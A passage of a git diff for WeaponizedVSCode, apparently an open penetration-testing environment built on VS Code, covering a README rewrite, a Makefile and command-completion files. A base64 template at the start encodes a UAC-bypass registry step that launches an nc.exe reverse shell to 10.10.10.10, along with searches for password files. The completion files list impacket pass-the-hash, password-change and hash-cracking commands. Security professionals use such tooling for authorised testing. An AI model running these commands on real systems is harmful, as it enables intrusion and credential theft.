9vdAoKYGBgCiMgUmVzdWx0OgoKYGBgCgp1cmwgb3BlbiBzZXR0aW5ncwoKYGBgCiMgUmVzdWx0OgoKYGBgCgojIyMgTEZJPyBSRkk/IFJlc3BvbmRlciBOVExNIGhhc2ggdGhlZnQ/CgpgYGAKIyBSZXN1bHQ6CgpgYGAKCiMjIyBVc2VycyBmb3VuZD8gU1NIIG9wZW4/IEJydXRlIGZvcmNlPwoKYGBgCiMgUmVzdWx0OgoKYGBgCgojIyBSRFAgUG9ydCAzMzg5CgpVc2VycwoKYGBgCnJkZXNrdG9wIC11ICcnIC1hIDE2CgojIFJlc3VsdCAoQSBzY3JlZW5zaG90IHdpbGwgZG8pOgpgYGAKCiMjIFdpblJNIDU5ODUKCmBgYAojIFJlc3VsdDoKCmBgYAoKIyMgTVNTUUwgUG9ydCAxNDMzCgpCYW5uZXIKCmBgYAojIFJlc3VsdDoKCmBgYAoKTm1hcCBzY3JpcHQgc2NhbgoKYGBgCiMgUmVzdWx0OgoKYGBgCgojIyBNeVNRTCBQb3J0IDMzMDYKCkJhbm5lcgoKYGBgCiMgUmVzdWx0OgoKYGBgCgpObWFwIHNjcmlwdCBzY2FuCgpgYGAKIyBSZXN1bHQ6CgpgYGAKCkRlZmF1bHQgY3JlZGVudGlhbDoKCmBgYApyb290OihlbXB0eSkKcm9vdDpyb290CgojIFJlc3VsdDoKCmBgYAoKQnJ1dGUgZm9yY2U/CgpgYGAKIyBSZXN1bHQ6CgpgYGAKCiMjIFBvc3RncmVzcWwgUG9ydCA1NDMyCgpEZWZhdWx0IGNyZWRlbnRpYWw6CgpgYGAKcG9zdGdyZXM6cG9zdGdyZXMKCiMgUmVzdWx0OgoKYGBgCgojIEFjdGl2ZSBEaXJlY3Rvcnk/CgojIyBTUE5zPwoKYGBgCmltcGFja2V0LUdldFVzZXJTUE5zCgojIFJlc3VsdDoKCmBgYAoKQ3JhY2sgdGhlIGhhc2g/CgpgYGAKIyBSZXN1bHQ6CgpgYGAKCiMjIFBhc3MgdGhlIEhhc2gKCkZvdW5kIHVzZXIncyBOVExNIGhhc2g/IENhbiB5b3UgcGFzcyBpdD8KCmBgYAojIFJlc3VsdDoKCmBgYAoKCiMgUHJpdmlsZWdlIEVzY2FsYXRpb24KCiMjIHdob2FtaSAvYWxsCgpgYGAKIyBSZXN1bHQ6CgpgYGAKCiMjIGhvc3RuYW1lCgpgYGAKIyBSZXN1bHQ6CgpgYGAKCiMjIG5ldCB1c2VyCgpgYGAKIyBSZXN1bHQ6CgpgYGAKCkFueSBuZXcgdXNlciBmb3VuZD8gUHJpdmlsZWdlIGVzY2FsYXRlIHRvIHRoZW0gZmlyc3Q/CgpgYGAKIyBSZXN1bHQ6CgpgYGAKCiMjIFN5c3RlbSBJbmZvCgpgYGAKc3lzdGVtaW5mbyB8IGZpbmRzdHIgL0IgL0M6Ik9TIE5hbWUiIC9DOiJPUyBWZXJzaW9uIiAvQzoiU3lzdGVtIFR5cGUiCgojIFJlc3VsdDoKCmBgYAoKCiMjIFJFRyBQYXNzb3dvcmRzPyBSRUcgQWx3YXlzSW5zdGFsbEVsZXZhdGVkPwoKYGBgCnJlZyBxdWVyeSBIS0NVXFNPRlRXQVJFXFBvbGljaWVzXE1pY3Jvc29mdFxXaW5kb3dzXEluc3RhbGxlciAvdiBBbHdheXNJbnN0YWxsRWxldmF0ZWQKcmVnIHF1ZXJ5IEhLTE1cU09GVFdBUkVcUG9saWNpZXNcTWljcm9zb2Z0XFdpbmRvd3NcSW5zdGFsbGVyIC92IEFsd2F5c0luc3RhbGxFbGV2YXRlZAoKIyBSZXN1bHQ6CgpgYGAKCgojIyBVQUMgQnlwYXNzCgpgYGAKUkVHIFFVRVJZIEhLRVlfTE9DQUxfTUFDSElORVxTb2Z0d2FyZVxNaWNyb3NvZnRcV2luZG93c1xDdXJyZW50VmVyc2lvblxQb2xpY2llc1xTeXN0ZW1cIC92IFtFbmFibGVMVUFdCgojIFJlc3VsdDoKCmBgYAoKUkRQIEFjY2Vzcz8KCmBgYAojIGp1c3Qgb3BlbiBhbiBBZG1pbmlzdHJhdG9yIGNvbW1hbmQgcHJvbXB0CmBgYAoKZm9kaGVscGVyPyBldmVudHZ3cj8KCmBgYAojIGZvZGhlbHBlci5leGUKUkVHIEFERCBIS0NVXFNvZnR3YXJlXENsYXNzZXNcbXMtc2V0dGluZ3NcU2hlbGxcT3Blblxjb21tYW5kClJFRyBBREQgSEtDVVxTb2Z0d2FyZVxDbGFzc2VzXG1zLXNldHRpbmdzXFNoZWxsXE9wZW5cY29tbWFuZCAvdiBEZWxlZ2F0ZUV4ZWN1dGUgL3QgUkVHX1NaClJFRyBBREQgSEtDVVxTb2Z0d2FyZVxDbGFzc2VzXG1zLXNldHRpbmdzXFNoZWxsXE9wZW5cY29tbWFuZCAvZCAiYzpcd2luZG93c1x0YXNrc1xuYy5leGUgMTAuMTAuMTAuMTAgNDQzIC1lIGNtZC5leGUiICAvZgogIAojIGV2ZW50dndyLmV4ZQpSRUcgQUREIEhLQ1VcU29mdHdhcmVcQ2xhc3Nlc1xtc2NmaWxlXHNoZWxsXG9wZW5cY29tbWFuZApSRUcgQUREIEhLQ1VcU29mdHdhcmVcQ2xhc3Nlc1xtc2NmaWxlXHNoZWxsXG9wZW5cY29tbWFuZCAvdiBEZWxlZ2F0ZUV4ZWN1dGUgL3QgUkVHX1NaClJFRyBBREQgSEtDVVxTb2Z0d2FyZVxDbGFzc2VzXG1zY2ZpbGVcc2hlbGxcb3Blblxjb21tYW5kIC9kICJDOlx3aW5kb3dzXHRhc2tzXG5jLmV4ZSAxMC4xMC4xMC4xMCA0NDMgLWUgY21kLmV4ZSIgL2YKYGBgCgpGb3IgbW9yZSwgY2hlY2sgdGhlIGZvbGxvd2luZyByZXBvLgoKW2h0dHBzOi8vZ2l0aHViLmNvbS9oZmlyZWYweC9VQUNNRV0oaHR0cHM6Ly9naXRodWIuY29tL2hmaXJlZjB4L1VBQ01FKQoKCmBgYAojIFJlc3VsdDoKCmBgYAoKCiMjIFdlYiBzZXJ2ZXIgbG9nIGZpbGVzPyBUcmFmZmljIGNvbWUgZnJvbT8KCmBgYAojIFJlc3VsdDoKCmBgYAoKIyMgV2luUEVBcwoKYGBgCiMgUmVzdWx0OgoKYGBgCgoKIyMgU2VydmljZXMgKEF1dG8sIFVucXVvdGVkKQoKYGBgCndtaWMgc2VydmljZSBnZXQgbmFtZSxkaXNwbGF5bmFtZSxwYXRobmFtZSxzdGFydG1vZGUgfGZpbmRzdHIgL2kgImF1dG8iIHxmaW5kc3RyIC9pIC92ICJjOlx3aW5kb3dzIgoKIyBSZXN1bHQ6CgpgYGAKCgojIyBuZXRzdGF0CgpgYGAKbmV0c3RhdCAtYW5vCgojIFJlc3VsdDoKCmBgYAoKCgoKIyMgV2luZG93cyBidWlsZD8gQW55IFB1YmxpYyBWdWxuZXJhYmlsaXR5PwoKYGBgCnBvd2Vyc2hlbGwgLWMgW2Vudmlyb25tZW50XTo6T1NWZXJzaW9uLlZlcnNpb24KCiMgUmVzdWx0OgoKYGBgCgoKIyMgU2NoZWR1bGVkIFRhc2tzCgpgYGAKc2NodGFza3MgL3F1ZXJ5IC9mbyBMSVNUIC92IHwgZmluZHN0ciAvdiAiXE1pY3Jvc29mdCIgfCBmaW5kc3RyIC9pICJ0YXNrbmFtZSIKc2NodGFza3MgL3F1ZXJ5IC9mbyBMSVNUIC92IC90biA8dGFza25hbWU+CkdldC1TY2hlZHVsZWRUYXNrIHwgd2hlcmUgeyRfLlRhc2tQYXRoIC1ub3RsaWtlICJcTWljcm9zb2Z0KiJ9IHwgZnQgVGFza05hbWUsVGFza1BhdGgsU3RhdGUKR2V0LVNjaGVkdWxlZFRhc2sgLVRhc2tOYW1lICJXb3JkIiAtVmVyYm9zZSB8IFNlbGVjdCAqCgojIFJlc3VsdDoKCmBgYAoKIyMgV2hhdOKAmXMgb24gdGhlIGRlc2t0b3A/IEFwcHM/IENvbmZpZyBmaWxlPyBFbWFpbD8gRlRQIHNlcnZlcj8KCmBgYAojIFJlc3VsdDoKCmBgYAoKCiMjIFBhdGNoPyBTTUJHaG9zdD8KCmBgYAp3bWljIHFmZSBsaXN0IHwgZmluZHN0ciAvaSBLQjQ1NDA2NzMKCiMgUmVzdWx0OgoKYGBgCgojIyBWdWxuZXJhYmxlIEFwcHM/CgpgYGAKZGlyICJDOlxQcm9ncmFtIEZpbGVzIgpkaXIgIkM6XFByb2dyYW0gRmlsZXMgKHg4NikiCgojIFJlc3VsdDoKCmBgYAoKCiMjIE90aGVyIFNlcnZpY2VzCgp1cG5wPyBJS0VFWFQKCmBgYApzYyBxdWVyeSBJS0VFWFQKCiMgUmVzdWx0OgoKYGBgCgoKYGBgCmRpciB3bGJzY3RybC5kbGwgL3MKUEFUSAoKIyBSZXN1bHQ6CgpgYGAKCnVzb3N2Yz8gQ2FuIG1vZGlmeT8gQ2FuIGNvbmZpZ3VyZT8KCmBgYApzYyBxYyBVc29TdmMKCiMgUmVzdWx0OgoKYGBgCgoKCgoKCiMjIEludGVyZXN0aW5nIEZpbGVzIGluIEM6XD8gQzpcVXNlcnNcX19fXEFwcERhdGFcUm9hbWluZz8gSG9tZSBEaXI/IFNvdXJjZSBDb2Rlcz8gU2NpcnB0IENvZGVzPyBQYXNzd29yZCBpbiBmaWxlcz8gKE1heSB0YWtlIGEgbG9uZyB0aW1lIHRvIGZpbmlzaCkKCmBgYApkaXIgL2EKZmluZHN0ciAvc3BpbiAvYzoicGFzcyIgQzpcKiAyPm51bApmaW5kc3RyIC9zcGluIC9jOiJwYXNzd2QiIEM6XCogMj5udWwKZmluZHN0ciAvc3BpbiAvYzoicGFzc3dvcmQiIEM6XCogMj5udWwKCiRmaWxlcyA9ICgidW5hdHRlbmRlZC54bWwiLCAic3lzcHJlcC54bWwiLCAiYXV0b3VuYXR0ZW5kZWQueG1sIiwidW5hdHRlbmRlZC5pbmYiLCAic3lzcHJlcC5pbmYiLCAiYXV0b3VuYXR0ZW5kZWQuaW5mIiwidW5hdHRlbmRlZC50eHQiLCAic3lzcHJlcC50eHQiLCAiYXV0b3VuYXR0ZW5kZWQudHh0IikKJG91dHB1dCA9ICRvdXRwdXQgKyAgKGdldC1jaGlsZGl0ZW0gQzpcIC1yZWN1cnNlIC1pbmNsdWRlICRmaWxlcyAtRUEgU2lsZW50bHlDb250aW51ZSAgfCBTZWxlY3QtU3RyaW5nIC1wYXR0ZXJuICI8VmFsdWU+IiB8IG91dC1zdHJpbmcpCgojIFJlc3VsdDoKCmBgYAoKIyMgQ3JlZGVudGlhbCBNYW5hZ2VyCgpgYGAKY21ka2V5IC9saXN0CgojIFJlc3VsdDoKCmBgYAoKWUVTPwoKYGBgCnJ1bmFzIC9zYXZlZGNyZWQgL3VzZXI6YWRtaW5pc3RyYXRvciAvcGF0aC90by9wYXlsb2FkCgojIFJlc3VsdDoKCmBgYAoKIyMgS2VybmVsIEV4cGxvaXRzPwoKYGBgCiMgc2VhcmNoIGZvciB3aW5kb3dzIDxidWlsZCBuby4+IGtlcm5lbCBleHBsb2l0CgojIHdpbmRvd3MgZXhwbG9pdCBzdWdnZXN0ZXIKCiMgc2VhdGJlbHQ/CgojIFJlc3VsdDoKCmBgYAo=" - ] + "default": "${workspaceFolder}/trojan" }, { "id": "note-filename", "type": "promptString", "description": "Enter the note filename", - "default": "${workspaceFolder}/note.md", - }, - // cyberchef url - { - "id": "visit-cyberchef", - "type": "command", - "command": "simpleBrowser.show", - "args": [ - "https://gchq.github.io/CyberChef/" - ] + "default": "${workspaceFolder}/note.md" }, - // kubeconfig creator { "id": "kubeconfig-gen-api-server", "type": "promptString", "description": "kubernetes api server", - "default": "https://server-ip:6443", + "default": "https://server-ip:6443" }, { "id": "kubeconfig-gen-sa-token", "type": "promptString", - "description": "kubernetes service account token under /var/run/secrets/kubernetes.io/serviceaccount/token", + "description": "kubernetes service account token under /var/run/secrets/kubernetes.io/serviceaccount/token" }, { "id": "kubeconfig-gen-namespace", @@ -260,7 +231,6 @@ "description": "kubernetes service account namespace", "default": "default" }, - // python version picker { "id": "python-versioned", "type": "pickString", @@ -271,11 +241,10 @@ "python3.10", "python3.11", "python3.12", - "python", + "python" ], "default": "python" }, - // Hashcat { "id": "hashcat-mode", "type": "pickString", @@ -286,7 +255,7 @@ "$HASHCAT_MODE_TOGGLE_CASE", "$HASHCAT_MODE_MASK_BRUTE_FORCE", "$HASHCAT_MODE_WORDLIST_MASK", - "$HASHCAT_MODE_MASK_WORDLIST", + "$HASHCAT_MODE_MASK_WORDLIST" ], "default": "$HASHCAT_MODE_WORDLIST" }, @@ -297,7 +266,7 @@ "options": [ "$HASHCAT_DEVICE_CPU", "$HASHCAT_DEVICE_GPU", - "$HASHCAT_DEVICE_FPGA", + "$HASHCAT_DEVICE_FPGA" ], "default": "$HASHCAT_DEVICE_GPU" }, @@ -326,9 +295,9 @@ "$HASH_KRB5_TGS_17", "$HASH_KRB5_TGS_18", "$HASH_JWT", - "$HASH_KRB5_AS_REP_23", + "$HASH_KRB5_AS_REP_23" ], - "default": "$HASH_MD5", + "default": "$HASH_MD5" }, { "id": "hashcat-hashfile", diff --git a/Makefile b/Makefile new file mode 100644 index 0000000..0c348b1 --- /dev/null +++ b/Makefile @@ -0,0 +1,18 @@ +build: + @echo "Building the project..." + uv run ./craft.py + uv run ./completion_creator.py + @echo "Build complete." + +install: build + @echo "Preparing the environment..." + WEAPON_LOCATION=$(shell pwd)/weapon_test ./installer.sh + @echo "Installation complete." + +install-trace: build + @echo "Preparing the environment with trace..." + WEAPON_LOCATION=$(shell pwd)/weapon_test ./installer.sh --trace-mode + @echo "Installation with trace complete." + +clean: + rm -rf ./hosts ./users ./weapon_test ./createhackenv.sh ./zsh_history \ No newline at end of file diff --git a/README.md b/README.md index d931133..b6a6639 100644 --- a/README.md +++ b/README.md @@ -1,69 +1,305 @@ -## Create Hacking Environment +# WeaponizedVSCode -### USAGE +A lightweight penetration testing environment management tool based on Visual Studio Code, designed for cybersecurity professionals and penetration testers. -[Usage Readme](./documents/USE.md) +## 🎯 Project Goals -[Custom Readme](./documents/CUSTOM.md) +WeaponizedVSCode aims to solve the following problems in traditional penetration testing: -[Demo](./documents/DEMO.md) +1. **Difficult Environment Switching** - Frequent switching between different project environment configurations +2. **Chaotic Tool Management** - Tools and payloads scattered across different directories +3. **Repetitive Configuration** - Each project requires reconfiguring Metasploit, reverse shells, etc. +4. **Scattered Records** - Credentials, notes, and files stored dispersedly +5. **Low Efficiency** - Lack of mechanisms for rapid payload generation -### AIM of project (which problem this project try to solve) +## ✨ Core Features -Cobalt Strike has a lot of features, but it's too heavy for only host machine or boxes. But it's inspired me a lot. +### 🔄 Project Environment Management +- **One-Click Project Environment Creation** - Use `createhack ` to quickly create pre-configured penetration testing projects +- **Smart Environment Switching** - Seamless switching between different projects with automatic configuration loading +- **Template-Based Configuration** - Pre-configured VSCode settings, tasks, and extension configurations -So I wanna create a lightweight hacking environment for myself and providing features like following: +### 🛠️ Integrated Tool Support +- **300+ Security Tool Integration** - Pre-configured command completion for common penetration testing tools +- **Smart Command History** - Tool index-based command history and auto-completion +- **Environment Variable Management** - Automatic detection and management of tool-dependent environment variables -1. different enviroment in different hacking project - content switching +### 🎮 Multi-Mode Terminals +- **Standard Shell** - Enhanced Zsh terminal with status display +- **Meterpreter Handler** - Auto-configured Metasploit listener +- **MSF Console** - Pre-configured Metasploit console +- **Netcat Handler** - Reverse shell handling terminal +- **Web Delivery** - HTTP server mode for file transfer +- **Kali OrbStack** - Virtual machine integration support (macOS) - > such as, you play #hackthebox machine and #tryhackme machine at the same time, and you have to switch the different environment for them. - > - > you will cost a lot time on switching the environment, and you will forget to switch the environment sometimes although you have a note for it. +### 📋 Project Organization Features +- **Structured Directories** - Automatically create hosts, users, credentials directories +- **File Management** - Convenient project file and web transfer file management +- **Note System** - Integrated Foam extension with bidirectional linked notes +- **Credential Management** - Centralized management of discovered user credentials -2. enviroments collections. put things about projects together. - save and clean +### ⚡ Quick Operations +- **Payload Generation** - VSCode task integration for rapid Msfvenom payload generation +- **Automated Scanning** - Integration of RustScan, Nmap, and other scanning tools +- **Proxy Management** - Convenient proxy switching and configuration +- **Host Management** - Automatic /etc/hosts file updates - > such as, you have a #hackthebox machine and you put all the tools together in a arsenal - > - > Now you need craft some payload and delivery it to the target machine - > - > before: you need to switch the environment to the arsenal folder , compile payloads and start a server(maybe http server or jndi server) to delivery the payload - > - > that compile will make the arsenal folder dirty, and you need to clean it up before you commit it to git - > - > and what you compile is useless for other projects which also need this payload - > - > if you want copy the payload back to the project folder, you need to find the project folder again and copy the path. - > - > now: you can create $PROJECT_WEB_DELIVERY for the payload and delivery it to the target machine, and you can easliy move the payload to $PROJECT_WEB_DELIVERY and delivery it to the target machine. also you save the payload for this project and you can use it again and keep the arsenal folder clean. +## 🔧 System Requirements -3. customized metaspoit rcfile for different projects +### Supported Platforms +- **Linux** (Recommended) +- **macOS** +- **Windows** (Partial functionality, not fully supported) - > such as, you have a #hackthebox machine and you want create a handler fastly. when your machine is resetting and recover the reverse shell again. - > - > now: you can edit the rcfile for project and use it in vscode terminal with `metasploit` mode. send trigger again and get the shell. +### Required Dependencies +```bash +# Core Tools +zsh # Shell environment +code # Visual Studio Code +python3 # Python runtime +vim # Editor -4. taking notes, log/save credentials, download files from remote machine and keep them tidy +# Network Tools +nc # Netcat +rlwrap # Command line wrapper - it works well with vscode. so you can use some vscode extensions and vscode features to do sth. +# Parsing Tools +awk, sed, grep, tr # Text processing tools +yq # YAML processor - like ssh with vscode or port fortwarding with vscode +# Security Tools +msfvenom # Metasploit payload generator +rustscan # Port scanner +wfuzz # Web fuzzing tool +hashcat # Password cracking tool +``` - > such as, you have a #hackthebox machine and you want to save the credentials you found in the machine. - > - > now: you can create a file named `cred` and save the credentials in it. `user` folder to save context with getting foothold and to user. `root` folder to save context with getting root. - > - > also I recommand using Foam in extensions.json to take notes and save the notes in the project folder. you can use the notes to write the report after you get the goal. you can use double linked like [[USE]] to go to the doucment use.md. - > +### Recommended Tools +```bash +simplehttpserver # Enhanced HTTP server +uv # Python package manager (performance optimization) +``` -5. fast payload generation with metasploit +## 🚀 Installation Guide - > such as, you have a #hackthebox machine and you want to craft a payload for it. - > - > now: you can use vscode tasks in vscode to generate the payload fastly. - > - > +### 1. Clone Repository +```bash +git clone https://github.com/Esonhugh/WeaponizedVSCode.git +cd WeaponizedVSCode +``` -6. more feature ... +### 2. Build Project +```bash +# Build using Make (recommended) +make build +# Or build manually +uv run ./craft.py +uv run ./completion_creator.py +``` -### Happy hacking. ;) +### 3. Install to System +```bash +# Default installation (installs to ~/.local/weapon) +./installer.sh + +# Custom installation location +WEAPON_LOCATION=/your/custom/path ./installer.sh + +# Force reinstallation +./installer.sh --force-install + +# Enable performance tracing mode +./installer.sh --trace-mode +``` + +### 4. Verify Installation +```bash +# Check script integrity +python3 verify.py createhackenv.sh + +# Reload shell configuration +source ~/.zshrc +``` + +## 📖 Usage + +### Create New Project +```bash +# Create new penetration testing project +createhack my-project +# Or use alias +createhackenv my-project +``` + +### Environment Variable Configuration +Set environment variables in the project's `.vscode/env.zsh` file: +```bash +export RHOST="10.10.10.1" +export RPORT="4444" +export LHOST="10.10.14.1" +export LPORT="9001" +export DOMAIN="target.com" +``` + +### Terminal Mode Usage + +#### 1. Standard Shell Mode +- Automatically load project environment variables +- Display current status information +- Support all tool command completion + +#### 2. Meterpreter Handler Mode +```bash +# Select "meterpreter-handler" terminal profile in VSCode +# Automatically start configured Metasploit listener +``` + +#### 3. Web Delivery Mode +```bash +# Select "web-delivery" terminal profile in VSCode +# Automatically switch to $PROJECT_WEB_DELIVERY directory and start HTTP server +``` + +### Common Command Examples +```bash +# Host Management +set_current_host 10.10.10.1 +dump_hosts | sudo tee -a /etc/hosts + +# User Management +set_current_user administrator +update_user_cred_to_env + +# Scanning Operations +rustscan -a $RHOST --ulimit 5000 -- -A --script=vuln +nmap -sC -sV -p 139,445,80,21 $RHOST + +# Proxy Management +proxys on +proxys set http://127.0.0.1:8080 + +# File Operations +cp payload.exe $PROJECT_WEB_DELIVERY/ +``` + +## 🏗️ Project Structure + +``` +WeaponizedVSCode/ +├── craft.py # Environment build script +├── completion_creator.py # Command completion generator +├── installer.sh # Installation script +├── verify.py # Script verification tool +├── launch_helper.zsh # Shell launch helper +├── Makefile # Build configuration +├── .vscode/ # VSCode template configuration +│ ├── settings.json # Editor settings +│ ├── tasks.json # Task configuration +│ ├── extensions.json # Recommended extensions +│ ├── env.zsh # Environment variables +│ ├── metasploit_handler.rc # MSF configuration +│ └── source_*.zsh # Mode launch scripts +├── completion_indexer/ # Tool command index +│ ├── nmap # Nmap command set +│ ├── burpsuite # Burp Suite command set +│ ├── metasploit # Metasploit command set +│ ├── _weapon # Built-in tool commands +│ └── ... # 300+ tool command sets +└── documents/ # Project documentation + ├── USE.md # Usage instructions + ├── CUSTOM.md # Customization guide + └── DEMO.md # Demo documentation +``` + +### Created Project Structure +``` +my-project/ +├── .vscode/ # VSCode configuration +│ ├── .zshrc # Shell configuration +│ ├── env.zsh # Environment variables +│ └── ... # Other configuration files +├── hosts/ # Host information +├── users/ # User information +├── credentials/ # Credential information +└── web-delivery/ # Web transfer files +``` + +## 🎨 Custom Configuration + +### Modify Templates +1. Edit configuration files in the `.vscode/` directory +2. Run `python3 craft.py` to regenerate installation script +3. Commit changes to Git repository + +### Add New Tools +1. Create new tool command files in the `completion_indexer/` directory +2. Run `python3 completion_creator.py` to update command index +3. Rebuild and install + +### Environment Variable Check +```bash +# Check all used environment variables +python3 completion_creator.py +``` + +## 🔍 Troubleshooting + +### Common Issues + +#### 1. Command Completion Not Working +```bash +# Check if zsh_history file exists +ls -la ~/.local/weapon/zsh_history + +# Regenerate command index +python3 completion_creator.py +``` + +#### 2. Metasploit Mode Cannot Start +```bash +# Check if Metasploit is properly installed +which msfconsole +msfconsole --version + +# Check RC file +cat .vscode/metasploit_handler.rc +``` + +#### 3. Environment Variables Not Loading Correctly +```bash +# Check project environment variable file +source .vscode/env.zsh +echo $PROJECT_FOLDER +``` + +## 🤝 Contributing + +1. Fork this repository +2. Create a feature branch (`git checkout -b feature/AmazingFeature`) +3. Commit your changes (`git commit -m 'Add some AmazingFeature'`) +4. Push to the branch (`git push origin feature/AmazingFeature`) +5. Create a Pull Request + +## 📄 License + +This project is licensed under the MIT License - see the [LICENSE](LICENSE) file for details. + +## 🙏 Acknowledgments + +- Inspired by Cobalt Strike's environment management concepts +- Thanks to all security tool developers for their contributions +- Thanks to the VSCode community for providing a powerful extension ecosystem + +## 📞 Support + +- **GitHub Issues**: [Report Issues](https://github.com/Esonhugh/WeaponizedVSCode/issues) +- **Author**: Esonhugh + +--- + +**Happy Hacking! 🎯** + + ## 404Starlink + +WeaponizedVSCode has joined [404Starlink](https://github.com/knownsec/404StarLink) diff --git a/README2.md b/README2.md new file mode 100644 index 0000000..d931133 --- /dev/null +++ b/README2.md @@ -0,0 +1,69 @@ +## Create Hacking Environment + +### USAGE + +[Usage Readme](./documents/USE.md) + +[Custom Readme](./documents/CUSTOM.md) + +[Demo](./documents/DEMO.md) + +### AIM of project (which problem this project try to solve) + +Cobalt Strike has a lot of features, but it's too heavy for only host machine or boxes. But it's inspired me a lot. + +So I wanna create a lightweight hacking environment for myself and providing features like following: + +1. different enviroment in different hacking project - content switching + + > such as, you play #hackthebox machine and #tryhackme machine at the same time, and you have to switch the different environment for them. + > + > you will cost a lot time on switching the environment, and you will forget to switch the environment sometimes although you have a note for it. + +2. enviroments collections. put things about projects together. - save and clean + + > such as, you have a #hackthebox machine and you put all the tools together in a arsenal + > + > Now you need craft some payload and delivery it to the target machine + > + > before: you need to switch the environment to the arsenal folder , compile payloads and start a server(maybe http server or jndi server) to delivery the payload + > + > that compile will make the arsenal folder dirty, and you need to clean it up before you commit it to git + > + > and what you compile is useless for other projects which also need this payload + > + > if you want copy the payload back to the project folder, you need to find the project folder again and copy the path. + > + > now: you can create $PROJECT_WEB_DELIVERY for the payload and delivery it to the target machine, and you can easliy move the payload to $PROJECT_WEB_DELIVERY and delivery it to the target machine. also you save the payload for this project and you can use it again and keep the arsenal folder clean. + +3. customized metaspoit rcfile for different projects + + > such as, you have a #hackthebox machine and you want create a handler fastly. when your machine is resetting and recover the reverse shell again. + > + > now: you can edit the rcfile for project and use it in vscode terminal with `metasploit` mode. send trigger again and get the shell. + +4. taking notes, log/save credentials, download files from remote machine and keep them tidy + + it works well with vscode. so you can use some vscode extensions and vscode features to do sth. + + like ssh with vscode or port fortwarding with vscode + + > such as, you have a #hackthebox machine and you want to save the credentials you found in the machine. + > + > now: you can create a file named `cred` and save the credentials in it. `user` folder to save context with getting foothold and to user. `root` folder to save context with getting root. + > + > also I recommand using Foam in extensions.json to take notes and save the notes in the project folder. you can use the notes to write the report after you get the goal. you can use double linked like [[USE]] to go to the doucment use.md. + > + +5. fast payload generation with metasploit + + > such as, you have a #hackthebox machine and you want to craft a payload for it. + > + > now: you can use vscode tasks in vscode to generate the payload fastly. + > + > + +6. more feature ... + + +### Happy hacking. ;) diff --git a/completion_createor.py b/completion_creator.py similarity index 100% rename from completion_createor.py rename to completion_creator.py diff --git a/completion_indexer/_weapon b/completion_indexer/_weapon new file mode 100644 index 0000000..799ba11 --- /dev/null +++ b/completion_indexer/_weapon @@ -0,0 +1,27 @@ +update_user_cred_to_env +set_current_user +dump_users +update_host_to_env +set_current_host +dump_hosts +dump_hosts | sudo tee -a /etc/hosts +current_status +proxys +proxys on +proxys off +url encode "content==" +url decode "content%3D%3D" +wfuzz_vhost_http $DOMAIN $TOP_DNS +wfuzz_vhost_https $DOMAIN $TOP_DNS +venv-init +venv-activate +proxys on +proxys loc +proxys set http://127.0.0.1:8080 +rustscan -a $RHOST --ulimit 5000 -- -A --script=vuln +cp xxx $PROJECT_FOLDER/ +cp xxx $PROJECT_WEB_DELIVERY/ +cat file |url encode +cat file |url decode +ntlm $PASS +differ file1 file2 diff --git a/completion_indexer/aws b/completion_indexer/aws index d1325ca..de2d025 100644 --- a/completion_indexer/aws +++ b/completion_indexer/aws @@ -1,4 +1,4 @@ -aws configure --profile exegol +aws sts get-caller-identity aws s3 ls s3://mybucket aws s3 iam list-users aws s3 iam get-user --user-name $USER \ No newline at end of file diff --git a/completion_indexer/dirb b/completion_indexer/dirb index 63b29dc..1835cc9 100644 --- a/completion_indexer/dirb +++ b/completion_indexer/dirb @@ -1 +1 @@ -dirb "http://$TARGET" /usr/share/seclists/Discovery/Web-Content/big.txt +dirb "http://$TARGET" ${SECLIST}/Discovery/Web-Content/big.txt diff --git a/completion_indexer/dirsearch b/completion_indexer/dirsearch index 7aed1cc..545b957 100644 --- a/completion_indexer/dirsearch +++ b/completion_indexer/dirsearch @@ -1 +1 @@ -dirsearch -r -w /usr/share/wordlists/seclists/Discovery/Web-Content/quickhits.txt -u "http://$TARGET/" +dirsearch -r -w ${SECLIST}/Discovery/Web-Content/quickhits.txt -u "http://$TARGET/" \ No newline at end of file diff --git a/completion_indexer/donpapi b/completion_indexer/donpapi index cb5c7e2..4b09cc6 100644 --- a/completion_indexer/donpapi +++ b/completion_indexer/donpapi @@ -1 +1 @@ -DonPAPI "$DOMAIN"/"$USER":"$PASS"@"$TARGET" +DonPAPI "$DOMAIN"/"$USER":"$PASS"@"$RHOST" diff --git a/completion_indexer/impacket b/completion_indexer/impacket index d3516d2..ae3c5fa 100644 --- a/completion_indexer/impacket +++ b/completion_indexer/impacket @@ -68,6 +68,7 @@ dcomexec.py -hashes :"$NT_HASH" "$DOMAIN"/"$USER"@"$TARGET" atexec.py -hashes :"$NT_HASH" "$DOMAIN"/"$USER"@"$TARGET" changepasswd.py -newpass '123Pentest!!!' "$DOMAIN"/"$USER":"$PASS"@"$DC_HOST" changepasswd.py -newpass '123Pentest!!!' -hashes :"$NT_HASH" "$DOMAIN"/"$USER"@"$TARGET" +owneredit.py -action write -new-owner "$USER" -target "$TARGET_OBJECT" "$DOMAIN"/"$USER":"$PASS" owneredit.py -action write -new-owner "$NEW_OWNER" -target "$TARGET_OBJECT" "$DOMAIN"/"$USER":"$PASS" mssqlclient.py "$DOMAIN"/"$USER":"$PASS"@"$TARGET" describeTicket.py "$KRB5CCNAME" diff --git a/completion_indexer/john-the-ripper b/completion_indexer/john-the-ripper index 6685674..6261a5d 100644 --- a/completion_indexer/john-the-ripper +++ b/completion_indexer/john-the-ripper @@ -1,4 +1,4 @@ -john --format=NT --wordlist=/usr/share/wordlists/rockyou.txt --fork=10 HashToPwn.txt --rules=all +john --format=NT --wordlist=$ROCKYOU --fork=10 HashToPwn.txt --rules=all john --format=krb5tgs --wordlist=`fzf-wordlists` Kerberoastables.txt john --wordlist=`fzf-wordlists` ASREProastables.txt hjohn ASREProastables.txt diff --git a/completion_indexer/smtp-user-enum b/completion_indexer/smtp-user-enum index b9a1307..dafb1c0 100644 --- a/completion_indexer/smtp-user-enum +++ b/completion_indexer/smtp-user-enum @@ -1,3 +1,3 @@ -smtp-user-enum -M EXPN -U /usr/share/seclists/Usernames/top-usernames-shortlist.txt -t "$TARGET" "$PORT" -smtp-user-enum -M RCPT -U /usr/share/seclists/Usernames/top-usernames-shortlist.txt -t "$TARGET" "$PORT" -smtp-user-enum -M VRFY -U /usr/share/seclists/Usernames/top-usernames-shortlist.txt -t "$TARGET" "$PORT" +smtp-user-enum -M EXPN -U ${SECLIST}/Usernames/top-usernames-shortlist.txt -t "$TARGET" "$PORT" +smtp-user-enum -M RCPT -U ${SECLIST}/Usernames/top-usernames-shortlist.txt -t "$TARGET" "$PORT" +smtp-user-enum -M VRFY -U 